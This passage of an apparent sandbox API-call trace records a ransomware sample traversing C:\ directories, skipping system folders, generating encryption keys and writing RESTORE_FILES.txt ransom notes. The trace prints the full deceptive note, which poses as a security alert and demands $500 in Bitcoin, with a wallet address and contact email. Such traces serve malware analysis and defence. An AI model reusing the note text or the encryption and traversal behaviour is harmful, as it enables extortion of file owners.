SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0064.299] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0064.300] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0064.300] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0064.300] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0064.300] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0064.300] CloseHandle (hObject=0xac) returned 1 [0064.300] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 0 [0064.300] FindClose (in: hFindFile=0x447b60 | out: hFindFile=0x447b60) returned 1 [0064.301] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\RESTORE_FILES.txt") returned 33 [0064.301] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0064.301] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0064.301] WriteFile (in: hFile=0xa0, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f654*=0x53d, lpOverlapped=0x0) returned 1 [0064.302] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0064.302] WriteFile (in: hFile=0xa0, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f654*=0x2ac, lpOverlapped=0x0) returned 1 [0064.302] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0064.302] WriteFile (in: hFile=0xa0, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f654*=0xb1, lpOverlapped=0x0) returned 1 [0064.302] CloseHandle (hObject=0xa0) returned 1 [0064.302] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0064.302] lstrcmpiW (lpString1="pagefile.sys", lpString2="Windows") returned -1 [0064.302] lstrcmpiW (lpString1="pagefile.sys", lpString2="Program Files") returned -1 [0064.302] lstrcmpiW (lpString1="pagefile.sys", lpString2="Program Files (x86)") returned -1 [0064.302] lstrcmpiW (lpString1="pagefile.sys", lpString2="$Recycle.bin") returned 1 [0064.302] lstrcmpiW (lpString1="pagefile.sys", lpString2="System Volume Information") returned -1 [0064.302] wnsprintfW (in: pszDest=0x4484b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\pagefile.sys") returned 19 [0064.302] StrStrIW (lpFirst="pagefile.sys", lpSrch=".protected") returned 0x0 [0064.302] lstrcmpW (lpString1="pagefile.sys", lpString2="RESTORE_FILES.txt") returned -1 [0064.302] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f87c | out: pbBuffer=0x295f87c) returned 1 [0064.303] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f8a4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f8a4*=0x30) returned 1 [0064.303] CreateFileW (lpFileName="\\\\?\\C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.303] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0064.303] lstrcmpiW (lpString1="PerfLogs", lpString2="Windows") returned -1 [0064.303] lstrcmpiW (lpString1="PerfLogs", lpString2="Program Files") returned -1 [0064.303] lstrcmpiW (lpString1="PerfLogs", lpString2="Program Files (x86)") returned -1 [0064.303] lstrcmpiW (lpString1="PerfLogs", lpString2="$Recycle.bin") returned 1 [0064.303] lstrcmpiW (lpString1="PerfLogs", lpString2="System Volume Information") returned -1 [0064.303] wnsprintfW (in: pszDest=0x4484b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs") returned 15 [0064.303] lstrcmpW (lpString1="PerfLogs", lpString2=".") returned 1 [0064.303] lstrcmpW (lpString1="PerfLogs", lpString2="..") returned 1 [0064.303] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\PerfLogs\\*") returned 17 [0064.303] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\*", lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 0x447b60 [0064.303] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0064.303] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0064.303] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0064.303] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0064.303] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0064.304] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\.") returned 17 [0064.304] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0064.304] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0064.304] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0064.304] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0064.304] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0064.304] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0064.304] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0064.304] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\..") returned 18 [0064.304] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0064.304] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0064.304] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0064.304] lstrcmpiW (lpString1="Admin", lpString2="Windows") returned -1 [0064.304] lstrcmpiW (lpString1="Admin", lpString2="Program Files") returned -1 [0064.304] lstrcmpiW (lpString1="Admin", lpString2="Program Files (x86)") returned -1 [0064.304] lstrcmpiW (lpString1="Admin", lpString2="$Recycle.bin") returned 1 [0064.304] lstrcmpiW (lpString1="Admin", lpString2="System Volume Information") returned -1 [0064.304] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin") returned 21 [0064.304] lstrcmpW (lpString1="Admin", lpString2=".") returned 1 [0064.304] lstrcmpW (lpString1="Admin", lpString2="..") returned 1 [0064.304] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\*") returned 23 [0064.304] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\Admin\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x494b80 [0064.304] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0064.304] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0064.304] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0064.304] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0064.304] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0064.305] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\.") returned 23 [0064.305] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0064.305] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0064.305] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0064.305] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0064.305] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0064.305] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0064.305] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0064.305] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\..") returned 24 [0064.305] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0064.305] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0064.305] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0064.305] FindClose (in: hFindFile=0x494b80 | out: hFindFile=0x494b80) returned 1 [0064.305] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\RESTORE_FILES.txt") returned 39 [0064.305] CreateFileW (lpFileName="\\\\?\\C:\\PerfLogs\\Admin\\RESTORE_FILES.txt" (normalized: "c:\\perflogs\\admin\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0064.306] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0064.306] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0064.307] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0064.307] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0064.307] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0064.307] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0064.307] CloseHandle (hObject=0xac) returned 1 [0064.308] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 0 [0064.308] FindClose (in: hFindFile=0x447b60 | out: hFindFile=0x447b60) returned 1 [0064.308] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\RESTORE_FILES.txt") returned 33 [0064.308] CreateFileW (lpFileName="\\\\?\\C:\\PerfLogs\\RESTORE_FILES.txt" (normalized: "c:\\perflogs\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0064.308] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0064.308] WriteFile (in: hFile=0xa0, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f654*=0x53d, lpOverlapped=0x0) returned 1 [0064.309] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0064.309] WriteFile (in: hFile=0xa0, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f654*=0x2ac, lpOverlapped=0x0) returned 1 [0064.310] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0064.310] WriteFile (in: hFile=0xa0, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f654*=0xb1, lpOverlapped=0x0) returned 1 [0064.310] CloseHandle (hObject=0xa0) returned 1 [0064.310] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0064.310] lstrcmpiW (lpString1="Program Files", lpString2="Windows") returned -1 [0064.310] lstrcmpiW (lpString1="Program Files", lpString2="Program Files") returned 0 [0064.310] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0064.310] lstrcmpiW (lpString1="Program Files (x86)", lpString2="Windows") returned -1 [0064.310] lstrcmpiW (lpString1="Program Files (x86)", lpString2="Program Files") returned 1 [0064.310] lstrcmpiW (lpString1="Program Files (x86)", lpString2="Program Files (x86)") returned 0 [0064.310] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0064.310] lstrcmpiW (lpString1="ProgramData", lpString2="Windows") returned -1 [0064.310] lstrcmpiW (lpString1="ProgramData", lpString2="Program Files") returned 1 [0064.310] lstrcmpiW (lpString1="ProgramData", lpString2="Program Files (x86)") returned 1 [0064.310] lstrcmpiW (lpString1="ProgramData", lpString2="$Recycle.bin") returned 1 [0064.310] lstrcmpiW (lpString1="ProgramData", lpString2="System Volume Information") returned -1 [0064.310] wnsprintfW (in: pszDest=0x4484b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData") returned 18 [0064.310] lstrcmpW (lpString1="ProgramData", lpString2=".") returned 1 [0064.310] lstrcmpW (lpString1="ProgramData", lpString2="..") returned 1 [0064.310] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\*") returned 20 [0064.310] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\*", lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 0x447b60 [0064.311] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0064.311] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0064.311] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0064.311] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0064.311] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0064.311] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\.") returned 20 [0064.311] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0064.311] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0064.311] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0064.311] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0064.311] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f634*=0x30) returned 1 [0064.311] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\." (normalized: "c:\\programdata\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.311] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0064.311] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0064.311] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0064.311] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0064.311] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0064.311] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0064.311] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\..") returned 21 [0064.311] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0064.311] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0064.311] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0064.311] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0064.311] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0064.311] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f634*=0x30) returned 1 [0064.312] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\.." (normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.312] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0064.312] lstrcmpiW (lpString1="Adobe", lpString2="Windows") returned -1 [0064.312] lstrcmpiW (lpString1="Adobe", lpString2="Program Files") returned -1 [0064.312] lstrcmpiW (lpString1="Adobe", lpString2="Program Files (x86)") returned -1 [0064.312] lstrcmpiW (lpString1="Adobe", lpString2="$Recycle.bin") returned 1 [0064.312] lstrcmpiW (lpString1="Adobe", lpString2="System Volume Information") returned -1 [0064.312] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe") returned 24 [0064.312] lstrcmpW (lpString1="Adobe", lpString2=".") returned 1 [0064.312] lstrcmpW (lpString1="Adobe", lpString2="..") returned 1 [0064.312] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\*") returned 26 [0064.312] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x494b80 [0064.312] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 